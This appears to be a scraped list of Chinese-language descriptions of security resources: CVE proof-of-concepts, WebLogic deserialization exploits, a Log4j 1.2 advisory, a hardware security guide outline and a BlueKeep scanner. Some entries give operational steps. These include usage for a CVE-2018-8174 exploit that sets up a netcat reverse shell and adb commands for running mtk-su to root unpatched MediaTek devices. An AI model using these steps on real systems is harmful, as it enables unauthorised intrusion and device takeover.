Apache Tomcat 安全漏洞(CVE-2020-13935)验证POC

可以检测weblogic漏洞

CVE-2012-4969漏洞分析，详细的分析了该漏洞的造成原因！

20180717官网发布Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)漏洞修复补丁

CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接： 1. 漏洞描述 Apache Log4j是美国阿帕奇（Apache）软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在反序列化远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j 1.2.X中包含一个SocketServer类,该类很容易对不可信数据进行反序列化,当侦听日志数据的不可信网络流量时,与反序列化小工具结合使用时,可以利用该类远程执行任意代码.影响包含目前最新版本. 2. 漏洞危害 高危 影响范围 1.2.4 <= Apache Log4j <= 1.2.17(最新版) 修复建议 1.升级到Apache Log4j 2系列最新版 2.禁止将该类所开启的socket端口暴露到互联网 3. 漏洞验证 Apac

CVE-2018-8174_EXP 用法：CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数：-h，--help显示此帮助消息并退出-u URL，--url URL exp url -o OUTPUT，--output OUTPUT输出利用rtf -i IP，--ip IP表示netcat -p PORT ，--port netcat的PORT端口 例如： python CVE-2018-8174.py -u -o exp.rtf -i 2.2.2.2 -p 4444 将exploit.html放在您的服务器上（1.1.1.1） netcat收听[any] 4444（2.2.2.2） 好好享受 ！

自用CVE-2018-3191 weblogic反序列化exp。

硬件和固件安全指南 目录 1. 2. 2.1 2.1.1 2.1.2 2.1.3 2.1.4（已更新！） 2.1.5 2.2 2.2.1 2.2.2 2.2.3 2.3 2.3.1 2.3.2崩溃 2.3.3预示 2.3.4 BranchScope 2.3.5 TLBleed 2.3.6 PortSmash 2.3.7 NetSpectre 2.3.8微体系结构数据采样（MDS） 2.3.9 CacheOut （新！） 2.3.10走一条（新！） 2.3.11负载值注入（新！） 3.固件和微码漏洞 3.1 LoJax 3.2 Ryzenfall，Chimera，Fallout和Masterkey 3.3 Microsoft安全启动旁路（新！） 4.引导配置 4.1 UEFI强化 4.2 UEFI安全启动自定义（已更新！） 5.硬件升级指南（新！） 6.执照 7.

MTK CVE-2020-0069 su文件 使用方式翻译和解释 add by https://blog.csdn.net/OneT1me 1.使用adb命令,将文件push到/data/local/tmp 目录下 2.给这个文件云心权限，具体是chmod +x mtk-su 3.运行mtk-su ./mtk-su 4.如果shell变成#则说明成功 注意，这个适用于mtk的32位及64位系统，如果安卓系统的安全补丁时间在2020年3月份之后的无法生效，谷歌已经推送安全更新修复该问题，或者系统定制厂商拿的rom版本是mtk在2019年4月份之后释放的也无法使用已经修复

CVE-2019-0708扫描工具亲测可用